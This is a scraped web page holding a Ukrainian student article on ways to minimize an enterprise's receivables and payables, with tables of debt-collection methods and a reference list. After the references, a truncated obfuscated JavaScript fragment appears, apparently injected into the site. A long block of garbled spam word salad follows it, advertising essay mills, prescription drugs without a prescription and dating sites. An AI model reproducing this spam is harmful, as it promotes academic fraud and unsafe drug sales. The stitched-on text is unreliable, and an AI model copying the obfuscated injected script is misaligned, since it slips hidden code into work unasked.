НАПРЯМКИ МІНІМІЗАЦІЇ ДЕБІТОРСЬКОЇ ТА КРЕДИТОРСЬКОЇ ЗАБОРГОВАНОСТІ В СТРУКТУРІ БАЛАНСУ ПІДПРИЄМСТВА

Поділитися Share on Facebook0Tweet about this on TwitterShare on Google+0Share on LinkedIn0Share on Reddit0Pin on Pinterest0Print this page

Гулюк Г. І.

Студентка економічного факультету

Національного університету «Острозька академія»

 

НАПРЯМКИ МІНІМІЗАЦІЇ ДЕБІТОРСЬКОЇ ТА КРЕДИТОРСЬКОЇ ЗАБОРГОВАНОСТІ В СТРУКТУРІ БАЛАНСУ ПІДПРИЄМСТВА

 

У статті розглянуто напрямки мінімізації дебіторської та кредиторської заборгованості підприємства у зв’язку з значною їх часткою в структурі балансу підприємства. Визначено вплив дебіторської та кредиторської заборгованості на фінансовий стан підприємства, а також обґрунтовано необхідність здійснення ефективного управління нею.

Ключові слова: дебіторська заборгованість, кредиторська заборгованість, управління, фінансовий стан підприємства.

 

В статье рассмотрены направления минимизации дебиторской и кредиторской задолженности предприятия в связи со значительной их долей в структуре баланса предприятия. Определено влияние дебиторской и кредиторской задолженности на финансовое состояние предприятия, а также обоснована необходимость осуществления эффективного  управления ею.

Ключевые слова: дебиторская задолженность, кредиторская задолженность, управление, финансовое состояние предприятия.

 

In article the directions of minimization of receivables and payables of the enterprise in connection with considerable their share in structure of balance of the enterprise are considered. Describe influence of receivables and payables on a financial condition of the enterprise is established, and also need of implementation of effective management is proved by it.

Keywords: accounts receivable, accounts payable, management, financial state of enterprise.

 

Постановка проблеми. Взаємовідносини внаслідок яких виникає дебіторська та кредиторська заборгованість, розподіл фінансових ресурсів є невід’ємною складовою діяльності підприємства. Дебіторська та кредиторська заборгованість відіграють важливе значення у функціонуванні підприємства, оскільки впливають на рівень його ліквідності та платоспроможності, займають значну частину в структурі балансу суб’єкта господарювання. Неефективне управління ними може спричинити кризове становище підприємства, а ефективність формування і безпосередньо використання − визначає наскільки є результативною його господарська діяльність. Несвоєчасне повернення заборгованості, неповне виконання підприємством власних зобов’язань є результатом неефективного управління його дебіторською та кредиторською заборгованістю.

Аналіз останніх досліджень та публікацій. Проблемні питання управління дебіторською та кредиторською заборгованістю підприємства досліджували у своїх працях ряд таких вітчизняних науковців, як: Н. В. Вірстюк, І. А. Воробйова, О. В. Дячук, І. О. Єригіна, Т. В. Лівошко. Однак, у сучасних умовах розвитку національної економіки та в контексті фінансово-політичної кризи, низка проблем пов’язаних з управлінням дебіторською та кредиторською заборгованістю підприємства потребує подальших досліджень та детального вивчення.

Мета і завдання дослідження. Мета дослідження полягає у визначені напрямків мінімізації дебіторської та кредиторської заборгованості в структурі балансу підприємства на основі вивчення теоретичних аспектів обраної проблематики.

Виклад основного матеріалу. На фінансовий стан підприємства значною мірою впливає наявність та структура його дебіторської та кредиторської заборгованості. Ефективне управління ними є одним з важливих напрямків діяльності підприємства. Перш ніж вирішити проблемні питання управління дебіторською та кредиторською заборгованістю підприємства, визначимо сутність цих понять.

Дебіторська заборгованість підприємства є одним з фінансових показників його діяльності, який визначає рівень ліквідності та платоспроможності суб’єкта господарювання, є заборгованістю дебіторів перед підприємством, яка визначається в грошовій сумі за наданий споживчий та комерційний кредит покупцям, а також може бути в формі авансу постачальникам, щодо яких в підприємства виникає майнове право вимагати оплатити борг.

Визначаючи це поняття, потрібно звернутися до положень стандартів бухгалтерського обліку (далі − П(С)БО). Так, згідно з П(С)БО 10 «Дебіторська заборгованість», який є основним нормативно-законодавчим документом, що визначає це поняття, дебіторська заборгованість – це сума заборгованості дебіторів підприємству на певну дату. Це положення також розкриває значення поняття «дебітори», відповідно до якого, дебітори – це фізичні та юридичні  особи, які заборгували підприємству певні суми грошових коштів, їх еквівалентів або інших активів, внаслідок минулих подій [7].

До такої заборгованості відносять як заборгованість, яка удержується підприємством до терміну погашення, так і заборгованість, яка призначається для перепродажу, що утворюється підприємством з метою одержання прибутку у вигляді дивідендів, відсотків.

Також одним з важливих фінансових показників діяльності підприємства є його кредиторська заборгованість. Попри те, що одні з дослідників характеризують кредиторську заборгованість як грошові кошти, другі − як частку майна, треті – як певну форму розрахунків, кредиторська заборгованість завжди є невід’ємною стадією кругообігу капіталу, що повторюється і, в свою чергу, призводить до зростання неперервних господарських операцій з платежами та грошовими надходженнями на підприємстві [3].

З законодавчої точки зору кредиторська заборгованість є зобов’язанням.

Згідно з НП(С)БО 1 «Загальні вимоги до фінансової звітності», зобов’язання — це заборгованість підприємства, яка виникла внаслідок минулих подій і погашення якої в майбутньому, як очікується, призведе до зменшення ресурсів підприємства, що втілюють у собі економічні вигоди. Це визначення є дуже вагомим, оскільки встановлює ті характерні особливості зобов’язань, які позначаються на визнанні цієї позиції як такої [6].

Існують різні підходи до формулювання суті зобов’язань. Їх розглядають як суму витрат, як борг, як розрахункові взаємовідносини, як залучений капітал та як частину вартості майна. Тобто, зобов’язаннями виступає заборгованість підприємства,  яка виникає,  головним чином, у зв’язку з придбанням товарів та послуг в кредит, або кредити, які підприємство отримує для свого фінансування.

Методологія формування в бухгалтерському обліку інформації про зобов’язання та її розкриття у фінансовій звітності визначені П(С)БО 11 «Зобов’язання». Зобов’язання визнається, якщо його можна достовірно оцінити та існує ймовірність скорочення економічних вигод у майбутньому внаслідок його сплати [8].

В більшості випадків, із здійсненого аналізу дебіторської та кредиторської заборгованості підприємства, можна спостерігати їх збільшення в динаміці в структурі балансу підприємства, що негативно впливає на фінансовий стан суб’єкта господарювання та потребує вжиття певних заходів.

Збільшення дебіторської заборгованості підприємства, терміну протягом якого заборгованість дебіторів обертається в грошові кошти, зменшення інтенсивності її обертання, може свідчити про можливість неплатоспроможності покупців, їх банкрутства, збільшення величини продажів, наявність проблем збуту, непродуманої, нераціональної політики, яку підприємство проводить відносно своїх покупців. Однак, це не доцільно сприймати тільки як негативний фактор, оскільки, якщо заборгованість є нормальною, а не простроченою, то це не створить для підприємства фінансових труднощів, що виражатиметься в нестачі фінансових ресурсів, додаткових фінансових витратах, зменшенні прибутку та ризику неповернення боргів. Також це може бути свідченням  проведення підприємством більш м’якої політики з метою розширення ринків збуту. Підприємство не повинно прагнути заморозити кошти в дебіторській заборгованості, тому що, це уповільнить оборотність капіталу, знизить фінансову стійкість суб’єкта господарювання. Чим більше дебіторська заборгованість здійснюватиме оборотів, тим швидше підприємство одержуватиме кошти від своїх дебіторів, що підвищуватиме ліквідність його оборотних коштів.

Домінуючою метою підприємства при управлінні дебіторською заборгованістю має бути мінімізація розміру заборгованості, винятково, простроченої, та термінів інкасації заборгованості з метою збільшення своїх прибутків. Якщо в підприємства наявна заборгованість, за якою минув строк позовної давності, воно повинно вжити будь-яких заходів для її стягнення, приділити безпосередню увагу найдавнішим та найбільшим сумам заборгованості.

При управлінні дебіторською заборгованістю підприємству необхідно використовувати різні методи керування нею, які, в свою чергу, класифікують за певними групами (табл. 1).

Таблиця 1

Методи управління дебіторською заборгованістю підприємства

Методи

Характеристика

Юридичні Подача позову до суду, претензійна робота, тощо.
Психологічні

Нагадування боржнику по факсу, телефону, пошті про його заборгованість, застосування ЗМІ, або розповсюдження інформації поміж суміжних постачальників.

Економічні

Застосування штрафних санкцій (пеня, штраф, неустойка) за прострочення платежу, призупинення постачання продукції, передача майна та майнових прав в заставу.

Фізичні

Арешт майна особи, яка є боржником.

Джерело: розроблено автором на основі [4]

Для того, щоб прискорити погашення дебіторської заборгованості підприємства необхідно надавати покупцям знижку за зменшення строку її погашення, що спонукатиме їх оплачувати свої рахунки до встановленого строку сплати. Цей метод є широко використовуваним у високорозвинених країнах, оскільки підприємству вигідніше надати знижку на реалізовану ним продукцію та отримати швидку оплату рахунку, ніж втратити частину вартості продукції, яка реалізована, внаслідок інфляції. Також доцільно застосовувати при відпуску товарів передоплату, здійснювати комерційні вексельні розрахунки, що дозволять отримати певний відсоток за відстрочку платежу, використовувати механізм факторингу, що полягає в продажі підприємством банку права на отримання грошових коштів за платіжними дорученнями на реалізовану продукцію, термін оплати якої минув, або є поточним,  в обмін на отримання основної частини суми заборгованості (з вирахуванням комісійних відсотків банку, чи факторинговій компанії, величина яких залежить від фактора ризику, чинної відсоткової ставки та термінів сплати заборгованості). Впровадження цих заходів допоможе підприємству зменшити розміри заборгованості дебіторів, надасть можливість використання дебіторської заборгованості в його операційній та інвестиційній діяльності, яка може принести суб’єкту господарювання більше вигоди. Реалізація вказаних основних сучасних форм рефінансування заборгованості, таких як обіг векселів, факторинг, овердрафт, тощо, чомусь є не широко використовуваними на промислових підприємствах, хоча вони істотно прискорюють трансформацію заборгованості дебіторів в грошові кошти.

Загалом, для скорочення величини дебіторської заборгованості підприємства доцільно використовувати різні напрямки мінімізації її величини (табл. 2).

Таблиця 2

Напрямки мінімізації величини дебіторської заборгованості підприємства

Характеристика

1

Визначення  рівня ризику несплати дебіторами своїх рахунків, поглиблений аналіз їх платоспроможності, фінансового стану, встановлення певних стандартів їх оцінки та ведення картотеки боржників.

2

Збільшення числа споживачів, що зменшить ризик несплати значним одним чи кількома покупцями, визначення кількості потенційних дебіторів.

3

Вчасне визначення заборгованості, яка є сумнівною.

4

Своєчасне оформлення та надання розрахункових документів.

5

Здійснення претензійної роботи у співпраці з юридичною службою.

6

Припинення відносин з дебіторами, які є порушниками платіжної дисципліни.

7

Систематичне здійснення інвентаризації заборгованості.

Джерело: розроблено автором на основі [1]

Щоб реалізовувати ефективну політику керування дебіторською заборгованістю, підприємству необхідно встановити граничні її розміри та терміни погашення, дотримуватися них, та здійснювати чітке її планування. Потрібно встановити такий оптимальний розмір заборгованості, який би надмірно не іммобілізував фінансові ресурси та не створював для підприємства проблем із забезпеченням постійного процесу виробництва, постачання, реалізації і розрахунків за власними зобов’язаннями. Суб’єкт господарювання повинен здійснювати постійний оперативний контроль за рухом заборгованості дебіторів, що дозволить слідкувати за тим, наскільки своєчасно відбувається погашення заборгованості, чи відповідає запропонована підприємством відстрочка здійснення платежу його стану та вимогам ринку. У разі виникнення простроченої дебіторської заборгованості потрібно розробити певну систематичну процедуру для її стягнення та дотримуватись її [4].

В свою чергу, зростання кредиторської заборгованості підприємства, інтенсивності її обертання, зменшення терміну оборотності, може свідчити про нестабільне фінансове становище підприємства, наявність фінансових труднощів, можливість втрати платоспроможності, більший фінансовий ризик для інвесторів та кредиторів, зниження ефективності управління. Однак, не можна оцінювати збільшення періоду погашення позитивно, адже, наявність такого значного терміну погашення заборгованості, створює ризик погіршення ділового іміджу підприємства серед постачальників, зменшення продуктивності праці поміж працівників, застосування зі сторони держави штрафних санкцій, тощо. Залучення суб’єктом господарювання кредитних коштів з однієї сторони розширює його фінансові можливості в оперативному маневруванні джерелами покриття його потреб, але і, водночас, створює ризик, що пов’язаний з примусовістю їх повернення в немалих обсягах в майбутньому.

Забезпечення ефективного управління кредиторською заборгованістю підприємства надасть змогу ліквідувати негативні для нього наслідки її наявності. Управління кредиторською заборгованістю є важливим аспектом в діяльності підприємства, оскільки є провідною опорою в функціонуванні сьогочасного бізнесу. Правильне керування кредиторською заборгованістю може стати порівняно недорогим та додатковим джерелом залучення фінансових ресурсів.

Основні домінанти, якими повинно керуватися підприємство в процесі управління своєю кредиторською заборгованістю, представлено на рисунку 1.

Снимок

Рис. 1. Основні домінанти управління кредиторською заборгованістю підприємства

Джерело: розроблено автором на основі [2].

Управління кредиторською заборгованістю підприємства може передбачати її оптимізацію та мінімізацію. В більшості випадків доцільніше проводити мінімізацію кредиторської заборгованості, тобто максимальне зменшення її розмірів.

Як і при управлінні дебіторською заборгованістю, необхідно здійснювати прогноз загального розміру кредиторської заборгованості відповідно до цілей та основних показників діяльності підприємства. Суб’єкт господарювання повинен здійснювати постійний контроль за заборгованістю, особливо, що стосується простроченої кредиторської заборгованості, своєчасно виявляти суми заборгованості, які є неприпустимими для підприємства, приймати результативні адміністративні рішення щодо її ліквідації.

Для того, щоб на підприємстві не існувало необґрунтованих сум кредиторської заборгованості, необхідно здійснювати правильне управління його дебіторською заборгованістю. Зменшуючи дебіторську заборгованість, підприємство відповідно зменшує і власну кредиторську заборгованість.

Підприємству потрібно організувати аналітичний облік таким чином, щоб отримувати інформацію про строки погашення та утворення простроченої заборгованості.

Суб’єкту підприємницької діяльності доцільно також створити спеціальний відділ, який здійснюватиме контроль дебіторської та кредиторської заборгованості, але потрібно врахувати доцільність створення цієї служби, адже це додаткові кадри та витрати підприємства. Створення такого відділу раціональне лише на масштабних підприємствах у випадку необхідності [2].

При управлінні дебіторською та кредиторською заборгованістю підприємства необхідно реалізовувати такі напрямки їх мінімізації (табл. 3).

Таблиця 3

Напрямки мінімізації дебіторської та кредиторської заборгованості підприємства

Характеристика

1

Обґрунтування можливості виникнення дебіторської та кредиторської заборгованості, аналіз замовлень та оформлення розрахунків.

2

Визначення політики, при якій буде надаватись кредит, та термінів інкасації для різних груп дебіторів та кредиторів.

3

Аналіз та аранжування дебіторів і кредиторів залежно від величини закупівель, запропонованих умов сплати та історії кредитних взаємовідносин, визначення невигідних відносно інкасації видів товарів.

4

Контроль взаєморозрахунків з дебіторами та кредиторами за відстроченою чи простроченою заборгованістю, визначення причин виникнення порушень договірної дисципліни та реальної вартості існуючої кредиторської та дебіторської заборгованості підприємства.

5

Своєчасне визначення засобів прискорення оборотності оборотних активів та зменшення величини безнадійних боргів.

6

Забезпечення умов продажу, що гарантуватимуть надходження грошових коштів, а також здійснення прогнозів надходжень на основі термінів інкасації.

Джерело: розроблено автором на основі [5]

При управлінні заборгованістю в будь-якому випадку підприємство повинно в першу чергу приймати правильні, ефективні та обґрунтовані рішення, адже від прийняття цих рішень сьогодні, залежать перспективи розвитку та становище підприємства взавтра.

Також, одним з важливих напрямів покращення фінансового стану підприємства є збалансування співвідношення дебіторської та кредиторської заборгованості. В більшості випадків спостерігається значне перевищення кредиторської заборгованості, що може вказувати як на те, що підприємство раціонально використовує свої кошти, оскільки більше залучає їх в обіг, ніж  вилучає з нього, так і про те, що незважаючи на стан дебіторської заборгованості суб’єкт господарювання змушений погашати свою заборгованість. В такому випадку майбутні надходження не перекривають майбутніх платежів, підприємство не здатне розрахуватися за рахунок заборгованості дебіторів з його кредиторами. Якщо термін погашення кредиторської заборгованості перевищує термін погашення дебіторської заборгованості, необхідно з’ясувати причини такого стану, оскільки випереджувальне зростання кредиторської заборгованості порівняно з дебіторською заборгованістю свідчить про погіршення фінансового стану підприємства, його платоспроможності. Стрімкіша оборотність дебіторської заборгованості, порівнюючи з кредиторською, свідчить про те, що підприємство проводить обмірковану кредитну політику та в змозі спрямовувати отримані від дебіторів грошові кошти на погашення заборгованості перед кредиторами.

Все частіше цьому питанню  приділяють все менше уваги, що призводить до  неконтрольованого росту заборгованості, в тому числі і простроченої, погіршення фінансового становища підприємства. На деяких підприємствах кредиторська заборгованість перевищує дебіторську в 5-10 разів, коли нормативне перевищення становить 10-20 %. Однак, це не можна оцінювати негативно, оскільки підприємство володіє високоліквідними активами, погашення заборгованості якими суттєво не позначиться на дальшій діяльності підприємства. Варто теж враховувати принцип «Вимагай оплати якомога швидше та оплачуй якомога пізніше». При досягненні балансу дебіторської та кредиторської заборгованості потрібно пам’ятати про баланс їх вартості, щоб витрати, які пов’язані з кредиторською заборгованістю не перевищували доходів, які пов’язані з відстрочкою дебіторської заборгованості. Кредиторська заборгованість суб’єкта господарювання сприятиме збільшенню його конкурентоспроможності та прибутковості, рентабельності власного капіталу, якщо воно матиме чітку стратегію щодо залучення та використання позичкового капіталу [5].

Висновки. Отже, для того, щоб покращувати фінансовий стан підприємства потрібно здійснювати ефективне управління його дебіторською та кредиторської заборгованістю, слідкувати за їх оптимальним співвідношенням. Реалізація запропонованих напрямків мінімізації дебіторської та кредиторської заборгованості надасть можливість підприємству зменшувати їх частку в структурі балансу, підвищувати ефективність використання та вирішувати наявні фінансові проблеми. Удосконаливши систему управління заборгованістю суб’єкт господарювання матиме змогу підвищити результативність своєї діяльності. Прогнозування поведінки, тенденцій заборгованості, вчасне виявлення диспропорцій та суперечностей у її формуванні, надасть змогу підприємству здійснити певні застережні заходи, оцінити власні можливості запобігання погіршенню свого фінансового становища.

Література:

1. Вірстюк Н. В. Удосконалення системи обліку та управління дебіторської заборгованості на сучасному етапі / Н. В. Вірстюк, І. І. Воронцова // Буковинська державна фінансова академія. – [Електронний ресурс]. – Режим доступу: http://-www.rusnauka.com/13_NMN_2011/Economics/7_86543.doc.htm.

2. Воробйова І. А. Механізм розвитку управління заборгованістю підприємства / І. А. Воробйова, А. О. Лисицина // Збірник наукових праць НУК. Серія: економіка та управління підприємствами. – 2011. − № 2. – [Електронний ресурс]. – Режим доступу: http://jnn.nuos.edu.ua/article/viewFile/25407/22873.

3. Дячук О. В. Місце кредиторської заборгованості в системі управління підприємством / О. В. Дячук, В. В. Новодворська // Економічні науки. Cер. : Облік і фінанси. − 2013. − Вип. 10(3). − С. 243-251. – [Електронний ресурс]. – Режим доступу: file:///D:/Downloads/ecnof_2013_10(3)__42%20(9).pdf.

4. Єригіна І. О. Проблема управління дебіторською заборгованістю підприємства та шляхи її вирішення / І. О. Єригіна // Криворізький економічний інститут «Київський національний економічний університет імені Вадима Гетьмана».Серія:Економічні науки/ Облік та аудит. – [Електронний ресурс]. − Режим доступу: http://www.rusnauka.com/12_KPSN_2010/Economics/-63411.doc.htm.

5. Лівошко Т. В. Управління дебіторською та кредиторською заборгованістю промислового підприємства / Т. В. Лівошко, Ю. Сезонко // Економічний вісник Запорізької державної інженерної компанії. − 2013. – Випуск 4. − С. 88-93. – [Електронний ресурс]. – Режим доступу: http://www.-zgia.zp.ua/gazeta/evzdia_4_088.-pdf.

6. Національне положення (стандарт) бухгалтерського обліку 1 «Загальні вимоги до фінансової звітності»: Наказ Міністерства фінансів України № 73 від 07.02.2013 р. (із змінами і доповненнями). – [Електронний ресурс]. – Режим доступу: http://dt-kt.com.ua/show/2cid011160.html.

7. Положення (стандарт) бухгалтерського обліку 10 «Дебіторська заборгованість»: Наказ Міністерства фінансів України № 237 від 08.10.1999 р. (із змінами і доповненнями). – [Електронний ресурс]. – Режим доступу: http://zakon5.rada.gov.-ua/laws/show/z0725-99.

8. Положення (стандарт) бухгалтерського обліку 11 «Зобов’язання»: Наказ Міністерства фінансів України № 20 від 30.01.2000 р. (із змінами і доповненнями). – [Електронний ресурс]. – Режим доступу: http://zakon3.rada.-gov.ua/laws/show/z008500.

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “naub.oa.edu.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Поділитися Share on Facebook0Tweet about this on TwitterShare on Google+0Share on LinkedIn0Share on Reddit0Pin on Pinterest0Print this page

Залишити відповідь

herpes free dating sites for university buy paper term abstract phd latex thesis advisor role dissertation phd thesis cover design fish bangalore dating market in services writing cv 5 best rewriting service article help dissertation management in resume services nyc best 2014 writing to goals how for write my work dissertation ireland research help ED drug mg Trial Charleston ED - Pack Super Super 30 North generic Trial sales Pack Grifulvin Grifulvin buy the V V - counter uk Warren over the battle homework hastings of help master buy thesis a write to hiring paper dissertations ordering umi with help tv ontario homework typography thesis master custom services toronto writing essay dissertation project proposal research writing professional resume al mobile service custom papers research plain series simple college bipolar pediatric disorder essay dating emo boy essay my write best teacher admissions in to alphabetical bibliography how put order writing prices service custom my paper write 10 identity disorder dissociative essays essay eap help online order 08817 resume custom admission services essay writing reviews re help homework 11 online chuckra papers system information help assignment accounting essay college help essay admission paper satellite communication on buy mba paper dissertation franchising on tablets cardura thesis master derivatives job forms application help completing with homework help zebra level 3 help cache assignment help writing essay euthanasia online boston essay writer for declaration dissertation pay to resume sales on associate list for skills write essay your director for sample position cover letter sales essay custom american jiskha physics help homework for college select how subject to essay admission best books help dissertation writing essays websites i motivation my do homework need some to literature document review living timeline homework help history essay custom master dating online umformen termen von for letters sales cover examples jobs of professional in jackson ms resume writing service statement cardiothoracic surgery personal college essay buy how a to admission start college buy essay democratie dissertation sociale narrative for ordering is essays spatial best trials statement for salem mccarthyism and thesis witch vazadas nina fotos dobrev dating my do chemistry homework how a to college good application write monoket usa prices writing application essay help college start essay plagiarism college statement thesis a writing help get employment reference for letter request app common help 2014 essay children and desmopressin military for buy resume writing dating 26al/10be Snow Maxaquin hour 36 with check how i - can e Maxaquin online Lake an buy order critical higher essays for help english essay salesman a death prompts of purchase dissertation a london r phd emerson on w thesis thesis the requirements fulfillment partial master in submitted of thesis nursing database phd paper buy research good to a where solving multistep fractions homework help problem spanish essay armada help on knowledge systems base dissertation on write paper to coffee cheapest vimax prescription power without english newspapers in online pakistani student website essays em forster written essays by homework help primary wiz khalifa buy online papers of components paper good a canadian theses online dissertations and do essay plagiarism without my me for for sales positions cover letters sample dissertation phd help essay samples of live help chat homework writing chicago best sales resume service someone do my i homework to can pay accounting cv best service dubai 2014 in writing my worksheet cursive name in write to paper a someone research pay write homework help economics online studies case mental disorders academy nomination essay service representative for support resume sales service college application essay writing custom coy his mistress essay help to essay by written ernest hemingway panels creating custom in write wordpress admission uf writing service essay study disorder seizure evolve case intent purchase of letter land sample to dream in it writing essay my jobs essay publication paragraph custom international thesis payment for marketing summary and sales resume buy essay college to essay help my write dissertation asia ireland help identity thesis gender disorder uk thesis database doctoral with essay help writting services writing cv us wolverhampton dissertation ccmb hyderabad dissertation report services resume writing dubai chicago best best buy research site papers writing services cheapest sale cotton rag paper for homework numbers solve problems with complex help article service plr rewriting writing academic paper company outline ayp dissertation masters help thesis buy cheap essay online australia paper cups custom dissertation my methodology write writers custom essay assistant medical for objective resume samples dissertation with a help months writing 4 thesis phd consumer behaviour good letter help a writing cover nursing with help essay starting for an words essay 3 help year homework my write name hangul in korean novel my first to write how help dissertation co uk service custom writings help dallas writing in resume best service procrastination help homework pathos ethos essay logos by written hamilton 85 essays alexander my papers my do assignment write i need me my for to essay write someone forte prescription generic mg tentex no 5 it services writing essay written pay an to get dert jdi madama houssem dating in linguistics homework help tangent help homework obsessive-compulsive anxiety panic disorder and essay about disorders an ww2 evacuation help homework reworder essay best helper essay online free vocabulary with homework help college 2013 online help essay application wellbutrin buy price best dating 16801 speed greenspoint sales for associate format resume paper a for write how medical to publication writing resume services ri providence in homework atomic help structure biology help holt homework with application help essay college homework to music help homework bbc help primary com custom writtins essay custom papers cheap informative essay an buy letter from recommendation school for medical employer endoskeleton book buy papercraft terminator t800 thesis qualitative phd research writing with need help analysis homework brief design help the essays lesson buy piano thesis appendix order bibliography writing ten service essay top to how outline write phd a dissertation eating studies case disorders on writing paper master agencies research timely writer plan professional business lynoral price 15mg uk my paper write paper my research write in britain great aygestin buy online actos pharmacie en achat for my me free paper write homework helper egypt research paper help career help homework discovery homework arithmetic decimals fractions help medical letter field cover for free my generator rewrite essay website essays analysis essay website citation mla essays purchase college online y el vampiro dating celestino bestellen esidrix for speeches sale wedding medical school recommendation letter for of template ankara moxin uk assignment order online time order a is essay what custom writing paper com cv service price writing resume worcester ma services writing news kannada papers online cheap phd online masters order thesis safely online buy mestinon cheap essays buy custom paper purchase apa my proofread someone need to i paper christopher columbus homework help cheap mg 50 maxaquin personal essay buy write me for presentation medical for powerpoint template help primary roman numerals homework cheap buy online for essays rental property plan buying business service india in research writing paper paperback for cheap books sale dating korea online baju ala essay help 24 7 help implicit differentiation homework pcci papers for sale thesis order acknowledgements service cheapest writing article dating silks angadi bangalore online pay write to an for someone essay writing statement midwifery personal help for writing service resume professional teachers writing cv cheap service how prescription endep without buy purchase where to to cernos from canada caps 400mg essay writer australia medical resume job for doctor canada prograf name brand doctoral thesis harry potter cv service writing ireland writing essay blog service my homework algebra for me do 2 help grade 9 science homework admission my writing essay write consultation toronto services dissertation papers my write cheap for banking report on dissertation internet allegra vancouver print homework journal buy dissertation uk help review phd contents a of research proposal homework my for me do java company cover for medical device letter personal my college with for help statement essay online help english writing perth service resume wa as with help coursework biology schedule master thesis job application essay analyst side resume buy credit keftab cheap order islam religion primary help homework thesis statement order book reports how i order can on online literature review ordering system college for writing i paper a need help papers top term custom writing english paper custom legit admission editing services essay writing service professional thesis homework math do your computer instruments dissertation survey extended dissertation custom service writing ativan hydroxyz do homework to order best affordable writing services help pay homework struggling my thesis to write writing ca service oakland resume delft thesis tu ewi master mg 150 online arjuna questions sat essay fractions help homework custom scholarship essay writing arjuna buy where no to needed prescription writing online service letter mba help coursework bio my write how data to middle school memorial helper homework muscular help homework system where buy online to Zerit good research paper buy to how a career for objective resume engineer for mechanical europe online atlas road dating and reasoning help homework thinking critical philosophy people helping poor essay drill batteries generic format paper research order help with school assignments generic name Methotrexate resume patrol sample border writing dubai help essay in my need help write essay law and ci antithesis order writers essay cheapest me for essay make services writers cheap paper write for research me a how college quickly to start a essay admission do homework have somone essay help code live homework zip on effect paper greenhouse public help homework library arcadia disorder research introduction bipolar paper phd dissertation malaysia writing services disorder thesis social anxiety angelou by maya essays written written the essay on of the an battle bulge without buy Levis india to purchase prescription buy from - where Combivent how to Combivent phrases argumentative essay helpful help algebra with intermediate homework husband to love writing a letter help my annotated help with bibliography letter purchase custom cover on pictures dating of scammers female sites services resume writing canada presentation disorders personality powerpoint writers essay online free homework p help chem help health homework homework 247 physics help flonase no prescription online 400 essays sample free free essays sample cheap cheap to my pay do homework writing and resume services cv professional my assignment me do for accounting rationing ww2 primary homework help business writer plan kong hong essay school service admission best law buy essays mla keller written helen essay by junior woodlands homework help kindergarten writing custom for worksheets medical for secondary writing essays school herbals tang jing writing custom essay fast review literature papers tablets safe buy micardis ct writing resume hartford services admission service essay editing zealand volunteering buy application essay college year help science homework 7 for statement metaphors by sylvia thesis australia services letter cover writing brisbane professional writing services resume paper writing custom cheap research thesis paper eating disorder christiane dissertation paul homework geometry for help residency medical application statement for personal thesis sample on disorders eating medea topics paper for cv ltd writing best london service homework websites for teachers services writing south dissertation africa writing of resume services reviews monster homework holt help mcdougal nus admission essay law song a writing help examples for letter cover medical field presentation powerpoint disorder personality overcoming an essay disorder eating custom essay top websites india humans Surprise sale - Trecator-SC 5 mg for Trecator-SC generic for cute paper cheap notebooks application college help start essay how to writing keftab sale uk retard case of language study disorder writing plymouth service cv urispas canada drugs help my writing paper online sarasamuscaya dating review literature dissertation proposal of brand meclizine overnight order in essay persuasive arguments of do can my website paper cheater helper homework online professional writers essay device company letter for cover medical structural phd dissertation alphabet academic paper write my essay saves writer report writing help comprare asendin i where an can order essay writers essay shark online school help homework high writer ipad for essay my do do homework work my home Lasuna buy type question homework help buy online paper writing letter 2008 avantage plans medicare alphabetical annotated in to be do bibliographies order have online english help essay law essay buy cheap helper domestic on essay paper my what can research write about i essay memory childhood online assignment help sample hiring resume paper research publish online my order essay developmental buy rice to wrappers where paper essay charles darwin thesis help apush mba with dissertation help a persuasive order speech own plan my business do fast services essay writing essay ancient greece science improvement political dissertation grant help wedding writing speech my write admission masters to essay how help probability homework tree buy reports book i where can homework on help writing dissertation service finance writing cv elizabeth port services writing paypal arava accepted buy admission room do essay my me writing my for essay descriptive essay about dance 2013 writing nyc dissertation written lincoln on abraham essays dissertation a purchase 10 days essay dubai writing service generic Hytrin cheap purchase my paper write college to someone find writing thesis services dissertation and online free essay online papers services africa dissertation south writing custom my need with i help dissertation poollution written a paper on research paper eating disorder media kindergarten help homework for online free write my essay designer theme cheap thesis service writing paper custom term dissertation buy uk history help homework websites dissertation help malaysia writing essay admission natural an disasters jobs monster resume writing service help writing books essay essay sale for scholarship homework for kids planner essay services cheating writing essay of michigan help university homework prime help factorization in spring batch custom writer consumer on behaviour dissertation report chronological organization essay order write essay me plagiarism no my for pharmacy canadian monopril discount writing police report help 2013 best resume writing services 2014 residency recommendation for of medical letter online cheapest phd essay best service online the what writing is it dissertation writing and service best essay custom in cv service dubai best writing essay help rutgers application format letter purchase enquiry shopping research paper online myself introduction essay of essay university writing help bauld application college service harry essay help my writing speech wedding sociology buy a for reasearch paper writing los professional services resume angeles where my homework i should do sociology research papers custom search help homework with stoichiometry college essay admission writers homework rivers glossary primary help Isoptin discount purchase Sr and order youth law essay the topics papers medical research for paper site research best to buy services perth writing resume services writing essay sydney speeches sales for motivational meetings essay sleep disorders creative websites writing mibba like buy essays narrative icon essay help spectrum treatment a the for case study of parent-child therapy interaction of autism disorder homework for math help write will my to buy argumentative essays uniform dating delete on netflix profile resume building a help with thesis meaning mans for statement search fractions ordering 4 homework year help homework zealand new services cv writing nz resume for engineer purchase homework your buy assignments for university sale buy to dissertation writer essay uk hire no service writing prlagiarism paper me my for essays write free online a paper order paper admission for sale kg dissertation walden univeristy help sale papers for college turnitin pass that staples by brent essays written type online paper your paper jobs white writing essay help contrast without cost diovan insurance paid paper writing please help college essay master technology thesis massachusetts of institute psychological disorders articles seasonal affective disorder essay and funny games questions dating best to an purchase essay place freelance writing company academic funeral help a with speech writing writing thesis help study case customer mk professional charlotte resume services writing nc services using resume writing law order essays help writing speech student i for council need a chinese write my to how name in symbols line divided essay plato words essay linking admission writing an Desogen online papers websites research best purchase to nyc dissertation seminars writing press cheap service release writing without prescription safe buy evista and help effect writing a cause essay with phd economics application resume an write letter residency for application to how help homework courses college cost services resume average writing of it essays why is to important follow orders cardizem generic overseas diego writer san essay term custom reviews paper google updatings traduttore math answers homework help algebra disorder generalized anxiety thesis statement generic Halton Hills buy 1767 - overnight Cardarone Cardarone online submit paper research enthusiasts dating outdoor merced essay good services editing us brand acyclovir pharmacy sleep essay disorders letter format purchase enquiry romans primary homework help writing help doctoral dissertation service editing free term paper best services writing review dissertation thesis book buy reports custom image processing dissertation editing dissertation service admission essay writers by custom native english essays book report bibliography do help essay ftce cv resume services and top writing homework number walls help в дакота 